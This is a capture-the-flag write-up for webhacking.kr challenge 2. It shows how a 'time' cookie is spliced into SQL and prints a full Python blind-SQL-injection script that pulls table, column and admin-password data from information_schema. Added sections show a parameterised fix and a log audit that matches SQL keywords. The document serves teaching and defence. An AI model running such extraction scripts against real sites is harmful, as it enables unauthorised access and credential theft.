
[ webhacking.kr ] No. 2 (old)
sangjun
·2022. 2. 2. 13:25
Challenge source
```html
<!--
2022-02-02 01:35:05
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
```
Solution
- The HTML comment hints that we should look at admin.php.
- SQL injection does not seem to work there, so it looks like we have to find the admin password some other way.
- It feels like blind SQL injection.
- The only input vectors are the PHPSESSID and time cookies.
- Changing PHPSESSID logs us out, so I'll try SQL injection through the time value.
- When the injected condition is true the rendered time shows 1 second; when it is false it shows 0 seconds.
```python
import requests
import string
from pwn import *  # only used for log.info / log.critical

url = "https://webhacking.kr/challenge/web-02/"
tc = string.ascii_letters + string.digits + string.punctuation
cookie = {
    "PHPSESSID": "vinncgg3oi5pqsp06fu33k5ppp"
}


def leak_DB_CNT():
    # number of tables in the current database, returned through the time cookie
    query = "(select count(table_name) from information_schema.tables where table_schema=database())"
    cookie['time'] = query
    response = requests.get(url, cookies=cookie)
    return response.text


def leak_DB_length():
    # length of the first table name
    query = "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)"
    cookie['time'] = query
    response = requests.get(url, cookies=cookie)
    return response.text


def leak_DB_name():
    # read the first table name one character at a time (length 13 found above)
    result = ""
    for idx in range(1, 13 + 1):
        query = f"(select ascii(substring(table_name,{idx},1)) from information_schema.tables where table_schema=database() limit 0,1)"
        cookie['time'] = query
        response = requests.get(url, cookies=cookie)
        # the leaked integer is rendered as "MM:SS" after "2070-01-01 09:"
        parse = response.text[response.text.find("2070-01-01 09:") + 14:response.text.find("2070-01-01 09:") + 19]
        repl = parse.replace(":", " ")
        a = int(repl[:repl.find(" ")]) * 60
        b = int(repl[repl.find(" ") + 1:])
        result += chr(a + b)
    return result


def leak_column_cnt(db_name):
    query = f"(select count(column_name) from information_schema.columns where table_name='{db_name}')"
    cookie['time'] = query
    log.critical(f"query = {query}")
    response = requests.get(url, cookies=cookie)
    return response.text


def leak_column_length(db_name):
    query = f"(select length(column_name) from information_schema.columns where table_name='{db_name}')"
    log.info(f"payload= {query}")
    cookie['time'] = query
    response = requests.get(url, cookies=cookie)
    return response.text


def leak_column_name(db_name):
    # the only column is two characters long ("pw")
    result = ""
    for i in range(1, 2 + 1):
        query1 = f"(select ascii(substring(column_name,{i},1)) from information_schema.columns where table_name='{db_name}')"
        cookie['time'] = query1
        response = requests.get(url, cookies=cookie)
        parse = response.text[response.text.find("2070-01-01 09:") + 14:response.text.find("2070-01-01 09:") + 19]
        repl = parse.replace(":", " ")
        a = int(repl[:repl.find(" ")]) * 60
        b = int(repl[repl.find(" ") + 1:])
        result += chr(a + b)
    return result


def leak_pw_length():
    query = "(select length(pw) from admin_area_pw)"
    log.info(f"payload= {query}")
    cookie['time'] = query
    response = requests.get(url, cookies=cookie)
    print(response.text)


def leak_pw():
    # password is 17 characters long
    result = ""
    for i in range(1, 18):
        query1 = f"(select ascii(substring(pw,{i},1)) from admin_area_pw)"
        cookie['time'] = query1
        response = requests.get(url, cookies=cookie)
        parse = response.text[response.text.find("2070-01-01 09:") + 14:response.text.find("2070-01-01 09:") + 19]
        repl = parse.replace(":", " ")
        a = int(repl[:repl.find(" ")]) * 60
        b = int(repl[repl.find(" ") + 1:])
        result += chr(a + b)
    return result


log.critical("[+]leak DB CNT\n" + leak_DB_CNT())
log.critical("[+]leak DB Length\n " + leak_DB_length())
db_Name = leak_DB_name()
log.critical("[+]leak DB NAME\n" + db_Name)
log.critical("[+] leak colum cnt\n" + leak_column_cnt(db_Name))
log.critical("[+] leak colum length\n" + leak_column_length(db_Name))
log.critical("[+] leak colum name\n" + leak_column_name(db_Name))
leak_pw_length()
print(leak_pw())
```
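The root cause the script exploits is the time cookie being spliced straight into a SQL expression, so whatever integer a subquery yields shows up as seconds in the rendered time. As an added example (my own code, not the challenge's source, which is not shown on this page), here is a minimal model of that handler using sqlite3 in place of MySQL, beside a hardened version that allow-lists the cookie as a plain integer and binds it as a parameter. The datetime(..., 'unixepoch') call is an assumption standing in for whatever timestamp conversion the real backend applies; the base date differs from the "2070-01-01 09:" prefix the writeup parses, but the mechanism is the same.

```python
import re
import sqlite3

# Added example: in-memory stand-in for the challenge backend. Assumption: the
# real site runs MySQL; sqlite's datetime(x, 'unixepoch') plays the role of
# whatever timestamp conversion it applies to the 'time' cookie.
db = sqlite3.connect(":memory:")


def render_time_vulnerable(time_cookie: str) -> str:
    # The cookie value is concatenated into the SQL text, so any expression the
    # database accepts (including a scalar subquery) is evaluated as the timestamp.
    sql = f"SELECT datetime({time_cookie}, 'unixepoch')"
    return db.execute(sql).fetchone()[0]


def render_time_hardened(time_cookie: str):
    # Allow-list the shape of the value first, then bind it as a parameter:
    # anything that is not a plain integer never reaches the SQL parser.
    if not re.fullmatch(r"[0-9]{1,12}", time_cookie):
        return None  # caller should fall back to a server-side default
    row = db.execute("SELECT datetime(?, 'unixepoch')", (int(time_cookie),)).fetchone()
    return row[0]


if __name__ == "__main__":
    print(render_time_vulnerable("61"))             # 1970-01-01 00:01:01
    print(render_time_vulnerable("(select 61)"))    # 1970-01-01 00:01:01 (subquery result becomes the time)
    print(render_time_vulnerable("(select 1=1)"))   # 1970-01-01 00:00:01 (true -> 1 second, as the writeup observes)
    print(render_time_hardened("(select 61)"))      # None: rejected before any SQL runs
    print(render_time_hardened("61"))               # 1970-01-01 00:01:01
```

The hardened version deliberately rejects rather than sanitises: a cookie that is not an integer has no legitimate meaning for this handler, so there is nothing to clean up, and the parameter binding means even a value that passed the regex is never interpreted as SQL.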
Things to remember
1. Find the input vectors.
2. If there is no hint in the comments, try a dictionary attack.
3. When SQL injection turns up, think about how to obtain the database name and the table name.
4. Remember the information_schema.XXX tables.
5. When the XXX from point 4 is used in the where clause, the plural 's' is dropped (tables -> table_name, columns -> column_name).
6. Remember the database() function.
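On the defensive side, the payloads this writeup uses (subqueries against information_schema, ascii(substring(...))) are easy to spot in logs, because a legitimate time cookie is just an integer. As an added example, not part of the original post, here is a small audit over constructed log lines (the log format, session ids and addresses are invented) that flags every request whose time cookie is not purely numeric and records which SQL keywords it contains.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (assumption: the web server logs the Cookie
# header in this shape; the format and addresses are invented for the example).
SAMPLE_LOG = """\
10.0.0.5 GET /challenge/web-02/ cookie="PHPSESSID=abc; time=1643764505"
10.0.0.7 GET /challenge/web-02/ cookie="PHPSESSID=abc; time=(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema%3Ddatabase())"
10.0.0.7 GET /challenge/web-02/ cookie="PHPSESSID=abc; time=(select%20ascii(substring(pw%2C1%2C1))%20from%20admin_area_pw)"
10.0.0.9 GET /challenge/web-02/ cookie="PHPSESSID=xyz; time=99999"
"""

# Keywords that never belong in an integer cookie; matched case-insensitively.
SQL_MARKERS = re.compile(
    r"\b(select|union|information_schema|substring|ascii|database)\b", re.IGNORECASE
)


def cookie_value(line: str, name: str):
    """Return the URL-decoded value of cookie `name` from a log line, or None."""
    m = re.search(rf"\b{re.escape(name)}=([^;\"]*)", line)
    return unquote(m.group(1)) if m else None


def audit_log(log_text: str):
    """Return (client_ip, [markers]) for each line whose time cookie is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        value = cookie_value(line, "time")
        if value is None or re.fullmatch(r"[0-9]{1,12}", value):
            continue  # absent or well-formed: nothing to report
        markers = sorted({m.lower() for m in SQL_MARKERS.findall(value)})
        findings.append((line.split()[0], markers))
    return findings


if __name__ == "__main__":
    for ip, markers in audit_log(SAMPLE_LOG):
        print(f"{ip}: non-numeric time cookie, SQL markers: {', '.join(markers) or 'none'}")
```

The check is shape-based first (is it an integer?) and keyword-based second, so it also catches an attempt that uses functions not in the marker list; the markers only serve to explain the alert. The same allow-list regex is the one the application itself should apply before the value reaches a query.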